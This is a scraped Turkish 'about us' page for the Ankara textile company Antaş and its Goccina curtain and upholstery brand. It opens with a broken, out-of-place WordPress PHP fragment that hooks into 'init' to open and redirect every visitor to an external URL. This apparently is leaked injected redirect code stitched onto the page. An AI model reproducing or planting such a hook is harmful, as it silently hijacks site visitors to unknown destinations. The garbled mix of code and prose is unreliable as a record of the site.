window.open("' . esc_url($external_url) . '", "_blank");'; // Perform the redirection wp_redirect($external_url); exit; } // Hook the function to an appropriate action, e.g., 'init' add_action('init', 'automatic_redirect_to_external_site');
IE Warning
YOUR BROWSER IS OUT OF DATE!

This website uses the latest web technologies so it requires an up-to-date, fast browser!
Please try Firefox or Chrome!
 
 
 

 

1997 yılında, Ankara’da kurulan Antaş, Türkiye’nin dört bir yanına tekstil alanında toptan satış yapmaya başlamıştır. hakkimizdaKaliteli ürünleri ile kısa sürede büyük başarı yakalayan Antaş, 2002 yılında Goccina® markasını yaratmıştır.

Bunu müteakip, Ankara başta olmak üzere, birçok ilde, Goccina Mağazaları için franchise vermiştir.

 

2006 yılının başlarında, Goccina markasını ön plana çıkarmak amacıyla Çukurambar’da, 1.300 m2’lik Goccina showroomuyla perakende satışa başlamış; birçok elçiliğin, otelin, villanın, örnek dairenin, ofisin, mağazanın, okulun, hastanenin ve kafenin perde & kumaş & döşemelik tasarımını ve uygulamasını yapmıştır.

 

Bunun yanı sıra, mutfak dolabı, banyo dolabı ve ray dolapları üretimini de yaparak müşterilerinin ihtiyaçları doğrultusunda, proje uygulamada aktif olarak rol alan Antaş, hizmet verdiği tüm sektörlerde büyük başarı elde etmiştir.

 

Antaş, 2014 yılında, yenilenen yüzüyle, showroomunu Çayyolu’na taşımış; perde & kumaş & döşemelik faaliyetlerinin yanı sıra halihazırda taahhüt ve proje uygulamasına da devam etmektedir.

 

Antaş, perakende satışa başladığı 2006 yılından 2016 yılına kadar, Ankara’da müşteri kapasitesini yaklaşık 7 kat arttırmıştır.

 

Antaş, geçmişten günümüze, %100 müşteri memnuniyeti garantisiyle hizmet vermekte; müşterileriyle saygılı, mesafeli ve dürüst şekilde iletişim kurmayı kendisine ilke edinmektedir.